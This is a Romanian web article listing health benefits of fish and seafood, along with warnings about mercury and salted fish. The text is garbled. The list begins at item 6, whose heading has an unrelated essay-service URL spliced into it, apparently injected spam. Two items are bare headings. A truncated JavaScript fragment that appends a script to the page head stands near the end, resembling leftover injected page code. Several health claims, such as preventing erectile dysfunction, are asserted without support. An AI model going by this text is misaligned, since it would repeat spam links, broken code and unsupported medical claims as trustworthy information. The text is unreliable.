Alimentul zilei – CARNEA DE PESTE

Pestele este unul dintre alimentele pe care nutritionistii le

recomanda in orice situatie, fie ca va doriti sa slabiti, fie ca va

doriti sa gasiti alternative sanatoase la alte tipuri de carne, fie

ca vreti sa aveti o alimentatie echilibrata din punct de vedere

nutritional. In general, sunt recomandate 2-3 portii de peste

pe saptamana, in cadrul unei alimentatii echilibrate.

Carnea de peste este o sursa excelenta de acizi grasi esentiali omega-3 si omenga-6, proteine, vitamine (A,

B12, D, E) si minerale (potasiu, fier, iod, fosfor, seleniu). Cantitatile in care aceste substante minerale si

nutritive se gasesc in peste difera in functie de tipului pestelui (cel slab contine mai putine grasimi si acizi

grasi esentiali omega-3 si omenga-6 decat cel gras).


In special pestii mici (sardine, hamsii, ansoa), mancati cu tot cu oase, sunt o buna sursa de calciu. De

asemenea, conservele de peste, dar si fructele de mare sunt foarte bogate in calciu.

6. https://www.collegepapers.co.uk/. Previne anemia

Fierul din peste este mult mai bine absorbit decat fierul din vegetale. Iar daca este asociat si cu lamaia,

gradul de absorbtie este si mai mare.

7. Ajuta la buna functionare a creierului si imbunatateste memoria

Cercetatorii au constatat ca pestele gras ajuta memoria, iar la persoanele care mananca peste cel putin o

data pe saptama, probabilitatea de a dezvolta boala Alzheimer este semnificativ mai redusa decat in cazul

persoanelor care nu consuma peste.

8. Mentine sanatatea ochilor

Acizii grasi omega 3 contribuie la mentinerea sanatatii tesutului cerebral si a retinei.

9. Fructele de mare impiedica absorbtia substantelor chimice

10. Fructele de mare previn disfunctiile erectile

Consum de peste si fructe de mare are insa si efecte negative:

- crevetii sunt bogati in calciu, dar si in colesterol, insa acest colesterol nu duce la cresterea colesterolului din

sange;

- produsele din apa pot contine uneori cantitati toxice de mercur, dar si alte metale sau substante chimice

industriale; evitati sa mancati carne de rechin si peste-spada, aceste tipuri de peste fiind cele mai

contaminate;

- pestele sarat si afumat este contraindicat persoanelor cu hipertensiune arteriala sau boli hepatice.

if (document. currentScript) { d. getElementsByTagName(‘head’)[0]. appendChild(s);

Leave a Reply